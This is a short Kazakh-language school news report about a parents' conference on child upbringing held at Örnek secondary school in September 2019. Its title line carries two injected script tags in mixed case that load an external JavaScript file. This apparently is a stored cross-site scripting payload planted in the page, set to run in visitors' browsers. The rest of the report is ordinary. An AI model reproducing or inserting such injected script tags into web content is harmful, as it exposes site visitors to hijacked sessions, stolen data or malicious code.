Республикалық ата-аналар конференциясын өткізу есебі « 21 ғасырлық Қазақстан ата-аналары: Өз балаңа үлгі бол»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
27.09.2019
Қазақстан Республикасы Білім министрлігінің тапсыруымен Отбасылық тәрбие институты әзірлеген арнайы сценарий бойынша Өрнек орта мектебінде 26.09.2019 ж 1-11 сынып ата-аналары үшін конференция өтті. Ата-аналар конференциясында баяндамалар оқылып, видеоматериалдар мен слайдтар көрсетілді.
Ата-аналарға бала тәрбиесі жайлы ойлары мен ұстанымдарын анықтау мақсатында анкеталар беріліп, сонымен қатар ата-аналарға қандай маман көмегі қажет екендігі туралы диагностика жүргізілді. Ата-аналарға психологиялық көмек туралы ақпарат көрсетілген жадынамалар таратылды. Конференция директордың тәрбие ісі жөніндегі орынбасары мен сынып жетекшілердің қатысуымен өтті. Ата-аналар конференцияда педагог-психологпен бала тәрбиесі жайында еркін пікір алмасып, кеңес алды.